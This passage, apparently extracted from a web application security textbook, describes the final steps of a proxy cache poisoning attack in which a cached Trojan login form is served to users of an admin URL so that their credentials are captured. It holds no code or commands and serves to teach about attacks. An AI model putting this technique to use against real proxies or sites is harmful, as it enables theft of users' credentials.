Chapter 12  ■ Attacking Other Users

7. The application issues its actual response to the attacker’s second

request, containing the authentic contents of the URL 

http://wahh-

app.com/admin/

. The proxy server does not recognize this as being a

response to a request that it has actually issued, and so discards it.

8. A user accesses 

http://wahh-app/admin/

via the proxy server and

receives the content of this URL which was stored in the proxy’s cache.

This content is in fact the attacker’s Trojan login form, so the user’s cre-

dentials are compromised.

Download 5,76 Mb.

Do'stlaringiz bilan baham: